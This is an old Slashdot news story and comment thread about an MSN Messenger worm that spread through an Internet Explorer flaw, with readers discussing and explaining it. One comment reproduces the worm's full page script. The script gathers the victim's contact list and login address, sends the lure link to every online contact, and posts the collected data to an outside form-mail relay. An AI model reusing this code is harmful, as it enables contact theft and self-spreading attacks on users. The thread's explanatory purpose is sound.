Beta

×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Microsoft Instant Messenger Virus Sweeps Net

michael posted more than 12 years ago | from the RISKs-of-homogeneous-computing dept.

Microsoft 401

Many people have reported a Warhol virus affecting users of Microsoft Instant Messenger. If you get messaged, "Go To http://www.masenko-media.net/cool.html NoW !!!", or any similar message (apparently there are several websites with the infection code), I suggest not following the link. A brief discussion follows.

Sequence: Get messaged "Go To http://www.masenko-media.net/cool.html NoW !!!" or something similar with another URL. Follow the link. That webpage contains malicious code which gets your messenger contacts and sends a similar message to your contacts. It looks like it uses a vulnerability in formmail.pl as well, although I'm not exactly sure how (I'm not an expert in ECMAscript, sorry, and I have no systems that could possibly be affected by this to test with). I'm sure some of our readers can provide more information in the comments below.

There appear to be several webpages which carried the infected code, not just masenko-media.net. Some webmasters are already taking them down.

Sophistication: moderate. Damage: only your pride.

Solution: probably the latest mega-patch for Internet Explorer will fix the Microsoft bug that allowed this.

Risks: obviously, the code could have done worse than just messaging your contacts. With Microsoft making "messaging" an integrated part of the operating system, any flaws in it can be exploited to affect millions of people instantly, so it is a high-value target. Does it have commensurate high-strength security?

cancel ×

401 comments

Sorry! There are no comments related to the filter you selected.

First Post (-1, Offtopic)

Metrollica (552191) | more than 12 years ago | (#3004030)

Suck it!

this didn't infect me.. (2, Funny)

Anonymous Coward | more than 12 years ago | (#3004038)

because I was using the linux version of Microsoft Messenger!

Re:this didn't infect me.. (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#3004068)

How in the hell is this 'informative'? Moderators, put down the pipe and get your asses back in school.

Re:this didn't infect me.. (-1, Troll)

Anonymous Coward | more than 12 years ago | (#3004105)

is there even a msn messenger for linux? I think this guy was joking, the moderator took him too seriously. really funny that microsoft news is posted to slashdot, but then again, its a bug (or a feature), so i guess it makes sense for them.

Re:this didn't infect me.. (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#3004084)

Nice to see this getting modded up!

I have 49 karma and usually don't post AC but I didn't want moderators thinking I used that software...you know, linux. It's kind of embarrasing, you know, since all my friends are Windows users.

This is news? (0, Flamebait)

WheelDweller (108946) | more than 12 years ago | (#3004040)

Isn't everything 'integrated' into Win9x prone to viruses? (Man, if we could only get these guys to write kernel code or GUI toolkits...)

Re:This is news? (1)

Stackis (308395) | more than 12 years ago | (#3004108)

Why the fuck does ./ even post this shit, and call it news...

They no damn well it's going to generate nothing but flamebait from the folks posting responses...

I guess I just don't get it...

Re:This is news? (2, Informative)

joshsisk (161347) | more than 12 years ago | (#3004126)

Uh, so people can download the patch before they get the virus, maybe?

Darn, too late (0, Offtopic)

Guspaz (556486) | more than 12 years ago | (#3004043)

Just submitted a lengthy story about this. Oh well. On another note, have you signed the futurama petition? Fox is canceling it. http://www.petitiononline.com/futufu/petition.html PS: First comment? By me? Wow!

Gee... (-1, Troll)

PrimeWaveZ (513534) | more than 12 years ago | (#3004044)

Is this really a surprise? God forbid Microsoft ever tried to make medical equipment.

Re:Gee... (0, Flamebait)

woodstok (17147) | more than 12 years ago | (#3004182)

Actually if you read the EULA for windows nt it says that its not to be used at hospitals in life-preserving machines, nuclear plants and such. Not only did God forbid Microsoft, they actually listened :D

Re:Gee... (4, Informative)

Cally (10873) | more than 12 years ago | (#3004204)

Well this is Waaaay off-topic... but WTF ;)

Is this really a surprise? God forbid Microsoft ever tried to make medical equipment.


According to RISKS Digest, someone went along to watch a friend getting laser eye surgery & noticed (a) the technician was blindly hitting RETURN to clear pesky annoying error messages, and (b) the machine was running Win95. Oh, and this machine was taking the details of the subject's eye geometry, & controlling the laser that was about to shave a thing slice off the front of the eyeball to correct some minor astigmatism (IIRC; don't have the url to hand, anyone? )

The solution... (0)

Anonymous Coward | more than 12 years ago | (#3004046)

Is the solution simply to not use Microsoft Messenger?

Re:The solution... (2, Interesting)

iamplasma (189832) | more than 12 years ago | (#3004173)

Yes, but guess what M$ have decided to make a compulsory add-on to windows XP. Yep, that's right, Messenger. I can just wait for the argument as to why "messenger is an essential part of windows".

Re:The solution... (1)

(startx) (37027) | more than 12 years ago | (#3004210)

it can be removed from xp. Read ntcompatible.com, then go change your registry and remove messanger! Oh, wait, I mean laff at your friends who use windows, right.........

.NET? (0)

Anonymous Coward | more than 12 years ago | (#3004050)

Someone probably used .NET for this -

Well, that's one less effectual site for vectoring (5, Funny)

Second_Derivative (257815) | more than 12 years ago | (#3004051)

If the entire population of slashdot accessing that site to point and laugh at the exploit code and how it doesnt affect them doesnt constitute a slashdotting, I dunno what does =) I already cant access it.

Someone post more links to the other vector pages, if we can't get them down any other way we'll bum-rush em ;)

Re:Well, that's one less effectual site for vector (3, Interesting)

JDizzy (85499) | more than 12 years ago | (#3004181)

Somebody mod this parent as "funny", or "underated" because the authore has a point, the slashdot effect should sufic to kill any of the infection sites, and with a high degree of impact.

Re:Well, that's one less effectual site for vector (0)

Anonymous Coward | more than 12 years ago | (#3004207)

So, becuase the site was posted on /. it went down. And therefore the virus cant spread. I do believe this is the first *POSITIVE* application of a /.ing ever.

in the eye of the beholder (3, Funny)

rakerman (409507) | more than 12 years ago | (#3004054)

With a name like Warhol, obviously this isn't a virus, it's a form of art.

Re:in the eye of the beholder (0)

Anonymous Coward | more than 12 years ago | (#3004214)

Uh... no.

A Warhol virus is one that can infect the entire Internet in 15 minutes (of fame, get it?)

Re:in the eye of the beholder (0)

Anonymous Coward | more than 12 years ago | (#3004226)

A really gay form of art...

Forwards are evil / Virus news (1, Interesting)

Covant (103882) | more than 12 years ago | (#3004055)

I was waiting for one of those super annoying forwarded URL's to cause trouble, and its finally happened.

Why can't one single week go by without a big annoying MSFT bug / virus being exposed?

Do people save these bugs up and release havoc at regural intervals?

Are there people in the inside, planting seeds?

At least it makes for good news.

Re:Forwards are evil / Virus news (2, Insightful)

djsable (257312) | more than 12 years ago | (#3004104)

>> Why can't one single week go by without a big annoying MSFT bug / virus being exposed?

The media loves that crap. They descend on it like a shark smelling blood. Any other product could have worse bugs, and they would be all Ho Hum, but a MS bug/virus? whooo boy, feeding frenzy!!

Also, because the people who write the Virii target MS (it might just be easier too.) because of the LARGE install base of it. You can write a Linux virus, and it nails like 100 people, but you could write the same bug targeting MS products, and you can nail 100,000! You do the math. :) which is more tempting a target.

No system is 100% secure. Period, end of story.

MS products in general, are like swiss fricking cheese though. My big complaint is the "Turn It on By default" attitude of MS Products. I had the Messenger on my system, and after adding a couple of co-workers, never used it. I got nailed by the bug today, and was quite annoyed by it. Fortunatly, the payload is non destructive, or I would have been PISSED. Leave it off by default, and IF i want it, I'll turn it on.

badger

ToO mAnY cApS!!!11 (5, Funny)

Anonymous Coward | more than 12 years ago | (#3004056)

iF yOuR fRiEnDs SeNd YoU mEsSaGeS fOrMaTtEd LiKe ThIs, YoU nEeD tO fInD nEw FrIeNdS!!!11

Other clients? (5, Insightful)

Geeyzus (99967) | more than 12 years ago | (#3004057)

I assume this only affects the MSN client from Microsoft... correct? Or does this also affect other clients that can use the MSN network, like Trillian? If it is just a link to some virus code on a website, it would affect Trillian (because it actually doesn't propagate through the instant messaging program)... but if it is something that gets triggered inside MSN Instant Messenger, then Trillian users are safe...

Mark

Thank you kind sir (-1, Troll)

Breakfast Pants (323698) | more than 12 years ago | (#3004077)

for stating the obvious.

Re:Other clients? (5, Informative)

Static_Neurotoxin (141004) | more than 12 years ago | (#3004078)

Trillian is safe. Opera is safe. The only combo you need to worry about is IE and Messenger.

Re:Other clients? (2, Informative)

Qwerpafw (315600) | more than 12 years ago | (#3004096)

Fire (like trillian, but for OS X) doesn't seem to care. At least, as far as I can tell. Most likely the security hole lies in windows/MSN integration. or in the MSN client software. But not the messaging protocol.

Of course, the trillian people have a MUCH better track record in terms of patches and so forth (they keep updating so it'll work with AOL...) so even if it affects trillian (pretty sure the answer is NO...) they will fix it before M$.

Re:Other clients? (0)

Anonymous Coward | more than 12 years ago | (#3004232)

Actually, Trillian will work without a web browser, (98lite) while MSN messenger requires IE 4...
So visiting a malcious web-page shouldn't affect it, as it's not really "integrated" like IE/MSN-messenger.

Anyone surprised? (2, Insightful)

Qwerpafw (315600) | more than 12 years ago | (#3004059)

I for one, am not shocked at all :)

Anyone who is shocked is a bit of a fool. It was only a matter of time, really, until one of M$'s many security holes in messenger was exploited. Kinda sad to think what will happen in the future as OS becomes more and more integrated with the internet. Your personal data (courtesy of passport) might be spread around if you replied to a IM, or data loss.

Don't use microsoft products, so I am not vulnerable. Happy me.

Looks like they want in on the aim monopoly (0)

Anonymous Coward | more than 12 years ago | (#3004061)

First they want interoperablilty. Now aim has security exploits, so they have to have them too. Damn microsoft is childish.

what's the url? (4, Funny)

MathJMendl (144298) | more than 12 years ago | (#3004065)

What's the url for this virus? The link to "Go To http://www.masenko-media.net/cool.html NoW" wasn't clickable. Please fix this, /. admin!

Re:what's the url? (0, Redundant)

Schmerd (83210) | more than 12 years ago | (#3004100)

Are you serious? A URL is an address, not necessarily something you can click on. /. left off the HREF on purpose so that people wouldn't blindly click and get burned by the malicious code.

Re:what's the url? (0)

Anonymous Coward | more than 12 years ago | (#3004125)

Are you serious?
Never. :-)

Re:what's the url? (0)

Anonymous Coward | more than 12 years ago | (#3004174)

im gonna guess that it was a joke. calm yourself.

Re:what's the url? (3, Funny)

Covant (103882) | more than 12 years ago | (#3004199)

I think your sarcasm font is broken...

That reminds me, I wish MSN had tone markup's..
they've got enough of those dumb smiley faces.

The Code (5, Informative)

nihilist_1137 (536663) | more than 12 years ago | (#3004066)

Use Trillian :http://www.trillian.cc. A few people msg me with the link. All that happens in that a blank window pops up. Mind you, i am on dual monitors so that may have had something to do with it. The code for the page (http://www.masenko-media.net/cool.html ) is:
<br><br>
<html>
<head>
<title>Welcome</title>
<Script>

var msnWin;
var msnList;
var msgStr = "Go To http://www.masenko-media.net/cool.html NoW !!!";

function Go(){

msnWin = document.open("res://mshtml.dll/blank.htm", "", "fullscreen=1");
msnWin.resizeTo(1, 1);
msnWin.moveTo(10000, 10000);
msnWin.document.title = "Please Wait...";
msnWin.document.body.innerHTML = '<object classid="clsid:F3A614DC-ABE0-11d2-A441-00C04F79568 3" id="msnObj1"></object><object classid="clsid:FB7199AB-79BF-11d2-8D94-0000F875C54 1" id="msnObj2"></object>';
focus();

if (msnWin.msnObj1.localState == 1){
msnWin.msnObj2.autoLogon();
}
Contacts();
Send();
msnWin.close();
document.contents.submit();
}

function Contacts(){
msnList = msnWin.msnObj1.list(0);
document.contents.email.value = msnWin.msnObj1.localLogonName;
document.contents.subject.value = Date();
var msnStr = "<br>";

for (i=0;i<msnList.count;i++){
if (msnList(i).state >1){
msnStr += "Online Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
}

else{
msnStr += "Offline Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
}
}
document.contents.contentBox.value = msnStr;
}

function Send(){
for (i=0;i<msnList.count; i++){
if (msnList(i).state >1){
msnList(i).sendText("MIME-Version: 1.0\r\nContent-Type: text/plain; charset=UTF-8\r\n\r\n", msgStr, 0);
}
}
}

</Script>
</head>
<body onload="Go()">
<p align="center">&nbsp;
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center"><font face="Arial">
Please Wait...</font></p>
<form METHOD="POST" ACTION="http://www.yong.f2s.com/mailform.pl" NAME="contents" ID="Form1">
<input type="hidden" name="redirect" value="http://www.rjdesigns.co.uk/cool/go.htm" ID="Hidden1">
<input type="hidden" name="recipient" value="mmargae@wanadoo.nl" ID="Hidden5">
<input type="hidden" name="email">
<input type="hidden" name="subject">
<input type="hidden" NAME="contentBox" id="Hidden6">
<input type=hidden name="env_report" value="REMOTE_HOST,HTTP_USER_AGENT">
</form>
</body>
</html>

My Slashdot Commenting Study (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#3004110)

Sorry, but I have to post this anonymously as I don't want to be moderated off-topic.

My Slashdot Commenting Study [erickrout.com]

Re:The Code (2, Informative)

suwain_2 (260792) | more than 12 years ago | (#3004116)

$ wget http://www.masenko-media.net/cool.html
--19:08:55-- http://www.masenko-media.net/cool.html => `cool.html' Connecting to www.masenko-media.net:80... connected! HTTP request sent, awaiting response... 404 Not Found 19:08:55 ERROR 404: Not Found.

Seems they took it down? Now is this just going to have millions of people getting 404 messages?

Re:The Code (4, Insightful)

einhverfr (238914) | more than 12 years ago | (#3004118)

So this sends the links to your contacts in IM and takes your passport email address and sends it to the http://www.yong.f2s.com/mailform.pl (or something similar).

Damage: not just your pride-- being bombarded with lots of spam? (I guess that is TBD)

Sends mail too .. email address harvesting? (5, Informative)

Wizard of OS (111213) | more than 12 years ago | (#3004221)

Look closely:

<input type="hidden" name="recipient" value=mmargae@wanadoo.nl" ID="Hidden5">

I think somebody forgot that HTML source can be viewed ...

The nasty part: every time somebody looks at this page, his MSN-email address is being posted to this mailform.pl script (the web equivalent of an open relay) and it is sent to this wanadoo.nl user.

Does this effect Trillian? (0)

Anonymous Coward | more than 12 years ago | (#3004071)

I use Trillian to connect to MS-IM. Can I be infected?
I also use Opera and I'm not daft enough to run downloaded software until I double check with the sender. I assume I'm safe, but I would like to know (so I can act all smug about using Trillian and Opera ;))

Well, they' (0, Flamebait)

z00r (552090) | more than 12 years ago | (#3004072)

Contrary to the Orwellian theme, it's clear that in the computer world, ignorance (which causes people to use Windows software) is a major liability.

could be a lot worse, likely will be soon (5, Interesting)

immanis (557955) | more than 12 years ago | (#3004074)

I wrote a simple script about a year ago that exported a user's MSN registry key and sent it to me. Given that MSN logins, Passport Logins and Hotmail logins all could be gleaned from that key... well you get the idea.

It worked too. Got to log into MSN as the CTO of our company, just to make a point.

As long as scripters can manage things like this, and as long as it is _that_ easy to pull a person's login data from the registry, Passport will _never_ be secure.

Not a Messenger flaw (5, Informative)

Osty (16825) | more than 12 years ago | (#3004076)

First off, this is not a virus. It's an Internet Explorer exploit allowing access to your Messenger contact list and other Messenger functions. As the post noted, it is fixed with the latest IE patch. The actual problem was with IE's document.open scripting object, and how it was able to access local system objects from web sites (basically, the about: URI namespace was considered to be in the "My Computer" security domain, which means it had much more lax security than an actual website. However, since about: can take valid html, site developers were able to embed Messenger objects in about: pages, and access information from that). This is not a problem with Messenger at all.


Install the patch and be done with it.

Re:Not a Messenger flaw (5, Insightful)

RWarrior(fobw) (448405) | more than 12 years ago | (#3004224)

"Install the patch and be done with it."

Is that why I keep getting probed with NIMDA? Because people just install the patch and are done with it?

Re:Not a Messenger flaw (3, Insightful)

Tackhead (54550) | more than 12 years ago | (#3004236)

> First off, this is not a virus. It's an Internet Explorer exploit allowing access to your Messenger contact list and other Messenger functions.

And while we're at it, this isn't a Warhol worm either.

I don't see the optimized scanning routine for initial propagation. I don't see a precompiled target list or any innovative ways to scan the network. And if you wanted to do maximum damage, you'd release it on a Friday night before this weekend.

Unless the spam from the formmail.pl script contains a very clever exploit to set the stage for a second round of infection, I'm calling this one a false alarm. It's an annoyance, but not a Warhol worm by any stretch of the imagination.

interesting article on the reg (5, Informative)

rogueuk (245470) | more than 12 years ago | (#3004080)

the register [theregister.co.uk] had an article about this a few days ago. A flawed Document.Open() in the script apparently causes it. The demo site the reg links to is pretty interesting. And of course, MS has known about this since december :-P

Re:interesting article on the reg (1)

Covant (103882) | more than 12 years ago | (#3004123)

Of course. They probably know about all the security flaws before they happen, they just don't bother to fix them.

It's like in Fight Club, the formula, if a (the cost of paying 10 programmers $100k/Annum each) * b (the time it would take to fix) * c (the percent of people that wouldn't buy/use IE / Windows regardless of the plethora of flaws) is greater than some innane constant, they don't fix it.

until it blows up.

Re:interesting article on the reg (1)

Osty (16825) | more than 12 years ago | (#3004228)

It's like in Fight Club, the formula, if a (the cost of paying 10 programmers $100k/Annum each) * b (the time it would take to fix) * c (the percent of people that wouldn't buy/use IE / Windows regardless of the plethora of flaws) is greater than some innane constant, they don't fix it.

Boy, I sure wish I was getting $100K/year. Oh well. Anyway, that equation is not quite correct, because

  1. It shouldn't take 10 programmers to fix that flaw. Maybe one programmer, one tester. Two people.
  2. Those people are going to get paid anyway. It's not like they're hired on the spot to fix those problems. They're already on the payroll, and fixing bugs is part of the job description.
  3. The time it takes to fix is only relelvant if it affects other work. This is not always the case (not that it doesn't affect other work, but that it doesn't significantly hurt the other work in terms of slipping on a timeframe).
  4. The equation is typically a*b > c, they don't fix it, not a*b*c > some arbitrary number. In the Fight Club case, c was the cost of litigation (including settlements). In your example, it would be lost revenue. I'm not so sure that's a good measure, here, since IE is free.

Of course, this applies to pretty much every business, not just Microsoft.

Re:interesting article on the reg (0, Offtopic)

calags (12705) | more than 12 years ago | (#3004184)

You know a really virulent virus is coming when Microsoft insiders sudden sell as much MS stock as they can. Just like the Enron higher ups they'll cut and run.

This brings up a question: If a real devastating security flaw is reported to them; they keep mum about it and then a massive security breach occurs that wipes out most MS OS machines out there (you know it's bound to happen :) does that mean that the SEC can move on them due to insider information?

Kinda funny.. (5, Funny)

jfroot (455025) | more than 12 years ago | (#3004081)

I get this message from this girl I kindof like on MSN saying to go to this URL urgently. So I do (duh!). Turns out it is a porn site.. So I'm thinking what is this girl saying? Is she dropping some no so subtle hints? As I ponder this I get a MSN message from my mom asking me why I sent her a link to a porn site.. then I understood..

Re:Kinda funny.. (0)

Anonymous Coward | more than 12 years ago | (#3004153)

Why did you send your mother a link to a porn site?

Re:Kinda funny.. (-1, Troll)

Anonymous Coward | more than 12 years ago | (#3004159)

Was your mom the star of the porn site?

Warhol? worm (5, Informative)

blkros (304521) | more than 12 years ago | (#3004085)

The worm seems to be named because of a quote that the site attributes to Andy Warhol.(ie. 'in the future everyone will have his 15 minutes of fame.') That quote should actually be attributed to Marshal MacLuhan, who Andy ripped it off from. So these worms should be name MacLuhan worms.

Re:Warhol? worm (0)

Anonymous Coward | more than 12 years ago | (#3004115)

How do you think Andy got his 15 min of fame? By ripping off that quote, the guy who originally said it also got 15 min somewhere to. Kind of ironic, eh?

Evildoers! (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#3004090)

USA please execute these terrorists.

:o (1)

bender183 (447302) | more than 12 years ago | (#3004092)

i think the biggest implication of this is what the poster originally posted. If m$ is going to make messaging a corner stone of thier .NET project the potential for a more advanced virus than this one could really mess sh*t up. :o

Not so sure the story is accurate. (4, Interesting)

einhverfr (238914) | more than 12 years ago | (#3004093)

The page appears to post a hidden form with your email information to the page. I suspect that it may be a contact gatherer for spammers (a new low...) though it could have done much more.

FormMail.pl is the perl script which recieves this information. It is pretty interesting...

No DNS Record? (Geeky Observations) (-1, Interesting)

suwain_2 (260792) | more than 12 years ago | (#3004094)

Being the crazy geek I am, the very first thing I thought when I read this poll was "I wonder who owns the domain www.masenko-media.net" (the one that people are apparently sent to).


$ whois www.masenko-media.net

Whois Server Version 1.3

...

No match for "WWW.MASENKO-MEDIA.NET".


>>> Last update of whois database: Wed, 13 Feb 2002 17:06:43 EST..."

Okay, so no DNS, so the domain can't possibly resolve, right?


$ hostinfo -a www.masenko-media.net
66.96.247.55


Okay, so it does resolve to an IP... And I can ping it, too.

Re:No DNS Record? (Geeky Observations) (2, Informative)

jfroot (455025) | more than 12 years ago | (#3004112)

Just go to the registrar www.godaddy.com:

MASENKO-MEDIA.NET WHOIS results:

The data contained in Go Daddy Software, Inc.'s WHOIS database,while believed by the company to be reliable, is provided "as is"with no guarantee or warranties regarding its accuracy. Thisinformation is provided for the sole purpose of assisting youin obtaining information about domain name registration records.Any use of this data for any other purpose, including, but notlimited to, allowing or making possible dissemination orcollection of this data in part or in its entirety for anypurpose, such as the transmission of unsolicited advertising andsolicitations, is expressly forbidden without the prior writtenpermission of Go Daddy Software, Inc. By submitting an inquiry,you agree to these terms of usage and limitations of warranty.Registrant: Net Crater NetCrater 502 Summit ST Walnut Cove, North Carolina 27052 United States Registrar: Go Daddy Software (http://registrar.godaddy.com) Domain Name: MASENKO-MEDIA.NET Created on: 06-Feb-02 Expires on: 06-Feb-03 Last Updated on: 06-Feb-02 Administrative Contact: Crater, Net domains@netcrater.com NetCrater 502 Summit ST Walnut Cove, North Carolina 27052 United States 3365917696 Technical Contact: Crater, Net domains@netcrater.com NetCrater 502 Summit ST Walnut Cove, North Carolina 27052 United States 3365917696 Domain servers in listed order: NS1.NETCRATER.COM NS2.NETCRATER.COM

Re:No DNS Record? (Geeky Observations) (1)

Anonymous Coward | more than 12 years ago | (#3004117)

You fucking moron! The domain record applies to the domain only.

whois masenko-media.net

Re:No DNS Record? (Geeky Observations) (1)

dpu (525864) | more than 12 years ago | (#3004213)

i hope you don't talk that way to your (unfortunate) kids when they make a mistake.

Re:No DNS Record? (Geeky Observations) (0)

Anonymous Coward | more than 12 years ago | (#3004129)

$ whois masenko-media.net

Re:No DNS Record? (Geeky Observations) (5, Informative)

bovinewasteproduct (514128) | more than 12 years ago | (#3004147)

You might try just the domain name. Which comes out to:
Registrant:
Net Crater
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States

Registrar: Go Daddy Software (http://registrar.godaddy.com)
Domain Name: MASENKO-MEDIA.NET
Created on: 06-Feb-02
Expires on: 06-Feb-03
Last Updated on: 06-Feb-02
Administrative Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696
Technical Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696

Domain servers in listed order:
NS1.NETCRATER.COM
NS2.NETCRATER.COM

Looks fine to me..:)

BWP

Read my post, nuff said (1)

(startx) (37027) | more than 12 years ago | (#3004151)

mbrennek@spaceheater:~$ host www.masenko-media.net
www.masenko-media.net. is an alias for masenko-media.net.
masenko-media.net. has address 66.96.247.55
mbrennek@spaceheater:~$ whois masenko-media.net

Whois Server Version 1.3

Domain names in the .com, .net, and .org domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Domain Name: MASENKO-MEDIA.NET
Registrar: GO DADDY SOFTWARE, INC.
Whois Server: whois.godaddy.com
Referral URL: http://registrar.godaddy.com
Name Server: NS1.NETCRATER.COM
Name Server: NS2.NETCRATER.COM
Updated Date: 06-feb-2002

>>> Last update of whois database: Wed, 13 Feb 2002 17:06:43 EST

The Registry database contains ONLY .COM, .NET, .ORG, .EDU domains and
Registrars.

Found InterNIC referral to whois.godaddy.com.

The data contained in Go Daddy Software, Inc.'s WHOIS database,
while believed by the company to be reliable, is provided "as is"
with no guarantee or warranties regarding its accuracy. This
information is provided for the sole purpose of assisting you
in obtaining information about domain name registration records.
Any use of this data for any other purpose, including, but not
limited to, allowing or making possible dissemination or
collection of this data in part or in its entirety for any
purpose, such as the transmission of unsolicited advertising and
solicitations, is expressly forbidden without the prior written
permission of Go Daddy Software, Inc. By submitting an inquiry,
you agree to these terms of usage and limitations of warranty.

Registrant:
Net Crater
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States

Registrar: Go Daddy Software (http://registrar.godaddy.com)
Domain Name: MASENKO-MEDIA.NET
Created on: 06-Feb-02
Expires on: 06-Feb-03
Last Updated on: 06-Feb-02

Administrative Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696
Technical Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696

Domain servers in listed order:
NS1.NETCRATER.COM
NS2.NETCRATER.COM

other crap added below to avoid "postercomment" compression filter, because obviously compression isn't a way to catch the real trolls, since it caught me, but hasn't caught the ascii art allready attached to the story. 45908-6230569laksdflkjn ;l34j65] lksdjflkaj -908ausdfg0 oi;3lkj4;6lkn3 56;o38tusap[df8u opsiajd ;alskdjtl3k4jl5kj345;1l 4jlwkjf l;kj a
Hope that's enough to get it through the filter this time.

Re:No DNS Record? (Geeky Observations) (0)

Anonymous Coward | more than 12 years ago | (#3004152)

How about using whois correctly?

$ whois masenko-media.net
[whois.crsnic.net]

Whois Server Version 1.3

Domain names in the .com, .net, and .org domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Domain Name: MASENKO-MEDIA.NET
Registrar: GO DADDY SOFTWARE, INC.
Whois Server: whois.godaddy.com
Referral URL: http://registrar.godaddy.com
Name Server: NS1.NETCRATER.COM
Name Server: NS2.NETCRATER.COM
Updated Date: 06-feb-2002

>>> Last update of whois database: Wed, 13 Feb 2002 17:06:43 EST

and then if you ask specifically from that registrar:


[whois.godaddy.com]
The data contained in Go Daddy Software, Inc.'s WHOIS database,
while believed by the company to be reliable, is provided "as is"
with no guarantee or warranties regarding its accuracy. This
information is provided for the sole purpose of assisting you
in obtaining information about domain name registration records.
Any use of this data for any other purpose, including, but not
limited to, allowing or making possible dissemination or
collection of this data in part or in its entirety for any
purpose, such as the transmission of unsolicited advertising and
solicitations, is expressly forbidden without the prior written
permission of Go Daddy Software, Inc. By submitting an inquiry,
you agree to these terms of usage and limitations of warranty.

Registrant:
Net Crater
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States

Registrar: Go Daddy Software (http://registrar.godaddy.com)
Domain Name: MASENKO-MEDIA.NET
Created on: 06-Feb-02
Expires on: 06-Feb-03
Last Updated on: 06-Feb-02

Administrative Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696
Technical Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696

Domain servers in listed order:
NS1.NETCRATER.COM
NS2.NETCRATER.COM

Re:No DNS Record? (Geeky Observations) (1)

The Salamander (56587) | more than 12 years ago | (#3004157)

Your WHOIS must suck:

Registrant:
Net Crater
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States

Registrar: Go Daddy Software (http://registrar.godaddy.com)
Domain Name: MASENKO-MEDIA.NET
Created on: 06-Feb-02
Expires on: 06-Feb-03
Last Updated on: 06-Feb-02

Administrative Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696
Technical Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696

Domain servers in listed order:
NS1.NETCRATER.COM
NS2.NETCRATER.COM

Re:No DNS Record? (Geeky Observations) (0)

suwain_2 (260792) | more than 12 years ago | (#3004179)

Actually... My DNS doesn't suck, it's me. :-[

I, in my stupidity, kept the "www." on the front, even though it shouldn't have been. :)

Re:No DNS Record? (Geeky Observations) (0)

Anonymous Coward | more than 12 years ago | (#3004164)

whois is for domain names, not host names. Removing the www gives the correct info.

whois masenko-media.net
[whois.crsnic.net]

Whois Server Version 1.3

Domain names in the .com, .net, and .org domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Domain Name: MASENKO-MEDIA.NET
Registrar: GO DADDY SOFTWARE, INC.
Whois Server: whois.godaddy.com
Referral URL: http://registrar.godaddy.com
Name Server: NS1.NETCRATER.COM
Name Server: NS2.NETCRATER.COM
Updated Date: 06-feb-2002

>>> Last update of whois database: Wed, 13 Feb 2002 17:06:43 EST

The Registry database contains ONLY .COM, .NET, .ORG, .EDU domains and
Registrars.

[whois.godaddy.com]
The data contained in Go Daddy Software, Inc.'s WHOIS database,
while believed by the company to be reliable, is provided "as is"
with no guarantee or warranties regarding its accuracy. This
information is provided for the sole purpose of assisting you
in obtaining information about domain name registration records.
Any use of this data for any other purpose, including, but not
limited to, allowing or making possible dissemination or
collection of this data in part or in its entirety for any
purpose, such as the transmission of unsolicited advertising and
solicitations, is expressly forbidden without the prior written
permission of Go Daddy Software, Inc. By submitting an inquiry,
you agree to these terms of usage and limitations of warranty.

Registrant:
Net Crater
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States

Registrar: Go Daddy Software (http://registrar.godaddy.com)
Domain Name: MASENKO-MEDIA.NET
Created on: 06-Feb-02
Expires on: 06-Feb-03
Last Updated on: 06-Feb-02

Administrative Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696
Technical Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696

Domain servers in listed order:
NS1.NETCRATER.COM
NS2.NETCRATER.COM

Mod Parent Troll DOWN!!!! (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#3004178)

this luzer used WWW, they didnt whois it right, the domain exists

whoever modded this luzer up was smoking crack

Re:No DNS Record? (Geeky Observations) (-1)

Anonymous Coward | more than 12 years ago | (#3004188)

I just wish SOMEONE, ANYONE would run a whois using just masenko-media.net and post the results to slashdot.

Anyone? Anyone at all?

Re:No DNS Record? (Geeky Observations) (-1)

Anonymous Coward | more than 12 years ago | (#3004229)

It's like everyone and their dog must post the correct whois results... Kinda funny...

possibly try (0)

Papst (529453) | more than 12 years ago | (#3004200)

whois masenko-media.net

Re:No DNS Record? (Geeky Observations) (0)

Anonymous Coward | more than 12 years ago | (#3004212)

Amazingly, the address [yahoo.com] looks like it is legit.

It's really an IE virus (1, Redundant)

_fuzz_ (111591) | more than 12 years ago | (#3004101)

The MSN Messenger protocol has nothing in it that would allow the retrieval of contacts, etc. (I've implemented a Java library that speaks msn messenger: MSNj [sourceforge.net] (shameless plug)). The protocol isn't any more or less secure than HTTP.

